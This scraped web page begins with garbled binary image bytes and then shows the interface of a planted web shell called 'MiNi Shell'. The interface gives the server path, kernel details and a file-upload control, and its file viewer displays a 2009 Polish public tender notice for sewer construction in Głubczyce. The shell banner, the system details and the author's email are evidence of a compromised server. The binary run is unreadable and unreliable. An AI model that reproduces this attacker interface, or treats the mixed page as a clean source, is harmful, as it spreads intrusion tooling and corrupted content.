JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/253730-N-2009.html

<p class="kh_header"><b>Głubczyce: Sanitacja dorzecza rzeki Troi</b><br>
<b>Numer ogłoszenia: 253730 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głubczyckie Wodociągi i Kanalizacja sp. z o.o. , ul. Powstańców 2, 48-100 Głubczyce, woj. opolskie, tel. 077 4852721, faks 077 4852721 wew. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.glubczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sanitacja dorzecza rzeki Troi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis zamówienia zgodnie ze wspólnym słownikiem zamówień (CPV): 
Główny przedmiot: 
Kod CPV 45231300-8: Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
Dodatkowe przedmioty:
Kod CPV 45232423-3 - Roboty budowlane w zakresie przepompowni ścieków
Kod CPV 45231100-6 - Ogólne roboty budowlane związane z budową rurociągów
Kod CPV 45233142-6 - roboty w zakresie naprawy dróg;
2. Przedmiotem zadania inwestycyjnego jest: 
Sanitacja dorzecza rzeki Troi - budowa kanalizacji sanitarnej w miejscowościach: Zopowy, Zubrzyce i Bogdanowice.
3. W skład inwestycji wchodzą:
    a. kanalizacja sanitarna dla miejscowości Zopowy 5516 mb, w tym:
	DN 200 mm 3516 mb,(koszt kwalifikowalny)
	DN 200 mm     11 mb,(sieć rozdzielcza - nie objęta wnioskiem o                  
                                          dofinansowanie)
	DN 150 mm   541 mb,(koszt kwalifikowalny)
	DN 200 mm 1448 mb,(tranzyt grawitacyjny - nie objęty wnioskiem o   
                                          dofinansowanie)
	pompownie sieciowe 2 szt,(koszt kwalifikowalny)
	przykanaliki 49 szt - 582 mb.(koszt niekwalifikowalny)
    b. kanalizacja sanitarna dla miejscowości Zubrzyce 4 489 mb, w tym:
	DN 200 mm 3848 mb,(koszt kwalifikowalny)
	DN 150 mm   641 mb,(koszt kwalifikowalny)
	pompownie 5 szt,(koszt kwalifikowalny)
	przykanaliki 94 szt - 1292 mb.(koszt niekwalifikowalny)
    c.	kanalizacja sanitarna dla miejscowości Bogdanowice  5119 mb, w tym:
	DN 200 mm 4145 mb,(koszt kwalifikowalny)
	DN 150 mm   974 mb,(koszt kwalifikowalny)
	pompownia 1 szt,(koszt kwalifikowalny)
	przykanaliki 162 szt - 1097 mb.(koszt niekwalifikowalny).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.11.00-6, 45.23.24.23-3, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 8.	Wykonawca zapewni jako część swojej oferty wadium w wysokości 100 000,00 zł. Wadium może być wniesione w pieniądzu przelewem na konto Zamawiającego w Banku Spółdzielczym Głubczyce Nr: 65 8868 0004 1000 0000 0084 0001, z dopiskiem Wadium - Sanitacja dorzecza rzeki Troi.

Jeżeli wadium wnoszone jest w formie innej niż pieniądz (poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości), w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treść dokumentu musi wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia. 

Oryginały dokumentów należy złożyć w kasie GWiK., uzyskując potwierdzenie złożenia na kserokopii dokumentów.

Wadium należy wnieść w terminie do dnia 14.08.2009r. do godz. 1000.

Poręczenie lub gwarancja, o którym mowa powyżej powinno być ważne przez okres ważności oferty, powinno dotyczyć przedmiotowego zamówienia. W przypadku wnoszenia wadium w formie innej niż pieniądz odpowiednie dokumenty winny być złożone w kasie Zamawiającego w terminie wyznaczonym dla złożenia oferty. Wadium uważać się będzie za wniesione wtedy, kiedy znajdować się będzie ono na rachunku Zamawiającego, lub zostanie zdeponowane w kasie Zamawiającego (w razie wnoszenia wadium w formie innej niż pieniądz).
Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie przez Zamawiającego wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca przystępujący do przetargu powinien spełniać następujące wymagania:

1.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności oraz niepodleganie wykluczeniu z postępowania 
Podstawy prawne wykluczenia z postępowania określają art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. W przypadku podmiotów działających wspólnie warunek dotyczący niepodleganiu wykluczeniu zgodnie z art. 24 ust. 1 i 2,                     o którym mowa powyżej, muszą spełniać łącznie wszystkie podmioty działające wspólnie.

2. Sytuacja finansowa:
2.1.	wykonawca musi mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, określonymi na sumę 2 000 000 zł, co winno jednoznacznie wynikać z dokumentu określonego w pkt. IV. 1.2.10/,  
2.2.	wykonawca musi posiadać średnioroczny obrót w ciągu ostatnich trzech lat w zakresie wykonawstwa robót budowlanych odpowiadających przedmiotowi zamówienia w wysokości 7 000 000 zł, potwierdzony jak w pkt. IV-1.2.9/,
2.3.	Wykonawca powinien być ubezpieczony od odpowiedzialności cywilnej              w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej            2 000 000 zł, co powinno wynikać z dokumentu określonego w pkt. IV.1.2.11/. Wykonawca, który nie dysponuje polisą obejmującą pełny okres realizacji zamówienia, winien złożyć oświadczenie, iż zobowiązuje się do wznowienia polisy jw. na cały okres realizacji zamówienia przed wygaśnięciem posiadanej polisy.

3.	Potencjał kadrowy:
Wykonawca winien dysponować lub przedstawić pisemne zobowiązanie innego podmiotu dotyczące udostępnienia osób posiadających następujące uprawnienia budowlane:
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów wraz z zaświadczeniem o przynależności do odpowiedniej izby inżynierów budownictwa - 2 osoby,
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów wraz z zaświadczeniem o przynależności do odpowiedniej izby inżynierów budownictwa - 1 osoba,
- w specjalności drogowej wraz z zaświadczeniem o przynależności do odpowiedniej izby inżynierów budownictwa - 1 osoba,

Powyższe wymagania muszą być udokumentowane jak w pkt IV 1.2.6/,
4. 	Doświadczenie zawodowe:
    Wykonawca musi udowodnić poprzez przedstawienie w załączniku określonym   w pkt. IV.1.2.8/, oraz dołączenie dokumentów określonych w pkt. IV.1.2.8/, potwierdzających zrealizowanie w okresie ostatnich pięciu lat co najmniej dwóch zadań odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
     Jako każde zadanie odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia Zamawiający rozumie realizację dotyczącą budowy sieci kanalizacji sanitarnej o wartości nie niższej niż 6 000 000 zł obejmującej budowę sieci grawitacyjnej kanalizacji sanitarnej o długości min. 15 000 mb, wraz z montażem co najmniej 5 sztuk przepompowni ścieków.
	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający uzna za wystarczające spełnianie powyższego warunku przez dowolnego z wykonawców bądź łącznie, tj. gdy każdy z wykonawców wykaże realizację jednego zadania jak powyżej.
Jako referencje (inne dokumenty) dotyczące realizacji z ostatnich 5 lat przed dniem wszczęcia postępowania, Zamawiający uzna takie, które dotyczą realizacji zadań, których zakończenie miało miejsce nie wcześniej jak 5 lat przed dniem wszczęcia postępowania.

5.	Potencjał sprzętowy:
Wykonawca musi dysponować sprzętem budowlanym i środkami transportowymi niezbędnymi do wykonywania robót.
Wymagane jest posiadanie następujących narzędzi i urządzeń: koparki (gąsienicowa o poj. łyżki pow. 0,6 m3 - 2 szt.)., kop.-ładowarki o poj. łyżki 0,25 m3 - 4 szt., dźwigi, spycharki, samochody ciężarowe 5 - 10 t. - 4 szt., w tym wywrotki , sprzęt do zabezpieczenia wykopów (obudowy - 100 m2 ), sprzęt do wykonania przewiertów sterowanych, odtworzenia nawierzchni dróg, co należy udokumentować jak pkt IV 1.2. 7/.
  
6. Gwarancja:
    Oferent musi zaoferować minimum 36 miesięcy gwarancji na przedmiot zamówienia licząc od dnia odbioru końcowego.

-	Złożenie oferty jest jednoznaczne z akceptacją w całości warunków zawartych w niniejszej specyfikacji jako wyłącznej podstawy przetargu.
-	Od uczestników oczekuje się starannego zapoznania się z projektem, dostarczoną specyfikacją istotnych warunków zamówienia, a także dokonania wizji lokalnej na terenie przyszłej budowy oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty i podpisania umowy.
-	Wykonawca ponosi wszelkie koszty związane ze sporządzeniem              i złożeniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta powinna zawierać następujące dokumenty i oświadczenia:
1.1.	Wypełniony szczegółowo formularz oferty, część A SIWZ
1.2.	Dane dotyczące wiarygodności prawnej, finansowej i technicznej Wykonawcy:
1)	Oświadczenie z art. 22 ust 1 ustawy Prawo zamówień publicznych oraz, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29.01.2004 r. na załączniku nr I. 
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym                  w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6)	Wykaz osób i podmiotów, którymi dysponuje, lub będzie dysponował wykonawca i które będą uczestniczyć w realizacji zamówienia wraz                             z informacjami potwierdzającymi spełnienie warunku udziału w postępowaniu, oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował, a także z określeniem zakresu wykonywanych przez nie czynności z uwzględnieniem spełnienia wymogów pkt. III - 3, na załączniku nr II. 
7)	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca na załączniku nr III, z uwzględnieniem wymogu pkt. III - 5.
8)	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem  wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem                  i wartością robotom budowlanym stanowiącym przedmiot zamówienia,                      z podaniem ich wartości oraz daty i miejsca wykonania, oraz załączeniem co najmniej 2 referencji (innych dokumentów) od poprzednich zamawiających (inwestorów) zgodnie z wymaganiami pkt. III - 4, potwierdzających, że roboty zostały wykonane należycie, na załączniku nr IV.
9)	Bilans z rachunkiem zysków i strat, albo w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, udokumentowane jak w pkt III - 2.2).
10)	Informacja banku, lub spółdzielczej kasy oszczędnościowo - kredytowej,                    w których wykonawca posiada rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy; dokument jest aktualny, jeżeli został wystawiony nie wcześniej niż 3 miesiące przed terminem składania ofert, udokumentowane jak w pkt III - 2.1).
11)	Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, udokumentowane jak w punkcie III - 2.3.
1.3.  Kosztorys ofertowy, który winien być zgodny wartościowo z wynagrodzeniem zaoferowanym przez wykonawcę, w ramach oferty.
1.4. Harmonogram realizacji umowy w ujęciu rzeczowo-finansowym, zgodny                           z kosztorysem ofertowym oraz ramowym harmonogramem realizacji inwestycji stanowiącym część [D1] niniejszej siwz, zawierający zestawienie kosztów elementów robót bez podatku VAT. Będzie on podstawą do wystawienia faktur częściowych, obejmujących wykazane w harmonogramie elementy robót jako przedmioty oddzielnych odbiorów zgodnie z umową. Zamawiający wymaga, aby harmonogram rzeczowo - finansowy realizacji inwestycji dostarczony przez zamawiającego nie był zmieniony co do podziału na elementy rozliczeniowe wykazane przez zamawiającego, niemniej jednak dopuszcza wyodrębnienie w ramach tych elementów rozliczeniowych, mniejszych elementów rozliczeniowych, stanowiących skończone elementy robót budowlanych umożliwiające ich odbiór i fakturowanie. 
1.5.	Zaparafowany na dowód akceptacji przez osobę (osoby) upoważnioną do reprezentacji Wykonawcy projekt umowy.

UWAGI:
-	dokumenty z pkt. 1.2.1) - 1.2.11), mogą być przedstawione w formie oryginałów albo czytelnych kopii poświadczonych za zgodność z oryginałem przez wykonawcę,
-	złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów albo nierzetelnych oświadczeń zagrożone jest karą pozbawienia wolności (art. 297 ustawy z dnia 6.06.1997 roku - Kodeks Karny (Dz. U. z 1997 roku, nr 88, poz. 553 z późn. zm.) i zgodnie                                 z przepisami ustawy Prawo Zamówień Publicznych powoduje wykluczenie wykonawcy z postępowania o udzielenie zamówienia publicznego.

2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
2.1.	Zamiast dokumentów, o których mowa w pkt 1.2.1), 1.2.3), 1.2.5) składa odpowiedni dokument, lub dokumenty wystawione zgodnie z prawem kraju,                   w którym ma siedzibę, lub miejsce zamieszkania potwierdzające, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo ze uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie                     w całości wykonania decyzji właściwego organu.
2.2. Zamiast dokumentów, o których mowa w pkt. 1.2.4) składa oświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy. 
2.3.  Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 2.1. można je zastąpić dokumentem zawierającym oświadczenie złożonym przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
2.4.  Dokumenty i oświadczenia, o których mowa w pkt. 2., sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
3.   Oferta składana przez wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełniać następujące warunki:
3.1.  Spełniać warunki określone w pkt. III przy uwzględnieniu zsumowania danych od wszystkich podmiotów z zastrzeżeniem brzmienia pkt III.4;
3.2.  Zawierać dokumenty i oświadczenia wymienione w pkt. od 1.2.2) do 1.2.5) dotyczące każdego podmiotu; pozostałe dokumenty winny dotyczyć wykonawcy (konsorcjum, lub spółki cywilnej) tj. w ofercie muszą być złożone przedmiotowe dokumenty, przez tego/tych wykonawcę/wykonawców, który/którzy spełnia/spełniają warunek.
3.3. Musi być podpisana w taki sposób, by zobowiązywała prawnie wszystkie Strony;
3.4.  Zawierać pełnomocnictwo w rozumieniu art. 23 ust. 2 ustawy Prawo zamówień publicznych. 

Ponadto wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, w terminie 3 dni przed podpisaniem umowy o realizację niniejszego zamówienia, są zobowiązani przedstawić Zamawiającemu stosowne porozumienie regulujące ich współpracę zawierającą w swojej treści następujące postanowienia:
- związanie porozumieniem na czas nie krótszy niż czas trwania umowy dotyczącej niniejszego zamówienia publicznego (okres realizacji zadania + okres gwarancji),
- wyznaczenie spośród siebie Pełnomocnika upoważnionego do zaciągania zobowiązań w imieniu wszystkich wykonawców realizujących wspólnie Umowę,
- role i zadania każdego z Wykonawców wspólnie realizujących zamówienie,
- solidarną odpowiedzialność uczestników porozumienia wobec Zamawiającego z tytułu nie wykonania lub nienależytego wykonania umowy zawartej w wyniku niniejszego zamówienia publicznego,
- numery i nazwy rachunków bankowych, na które będą dokonywane
    płatności z tytułu realizacji przedmiotowej Umowy.

4.	Każdy Wykonawca przedłoży tylko jedną ofertę, sam lub jako reprezentant spółki cywilnej lub konsorcjum. Oferty wykonawcy, który przedłoży więcej niż jedną ofertę zostaną odrzucone.

5.	Oferta musi obejmować całość zamówienia.

6.	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia jaką zamierza powierzyć podwykonawcom. Wartość tej części nie może stanowić kwoty przekraczającej 10% ceny ofertowej.

7.	Kosztorysy ofertowe należy opracować metodą kalkulacji szczegółowej, przy czym: 
-	nie może ulec zmianie opis pozycji przedmiarowej oraz ilość jednostek przedmiarowych,
- dodatkowe pozycje jw. nie ujęte w przedmiarze, jeżeli nie zostały wycenione odrębnie przez wykonawcę, uważać się będzie, że zostały ujęte w innych pozycjach kosztorysu.
-	wykonawca określi ceny jednostkowe na wszelkie pozycje wymienione                         w przedmiarze. Pozycje, dla których nie zostaną wstawione przez wykonawcę ceny jednostkowe, nie zostaną zapłacone po ich wykonaniu i uważać się będzie, że zostały ujęte w cenach innych pozycji wymienionych w przedmiarze. 
Ceny jednostkowe określone przez wykonawcę zostaną ustalone na okres ważności umowy i nie będą podlegały zmianom z wyjątkiem odpowiednich zapisów umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.glubczyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Głubczyckie Wodociągi i Kanalizacja Sp. z o.o.
ul.Powstańców 2
48-100 Głubczyce
pokój.Nr 18.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 10:00, miejsce: Głubczyckie Wodociągi i Kanalizacja Sp. z o.o.
ul.Powstańców 2
48-100 Głubczyce
sekretariat pokój Nr 19.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com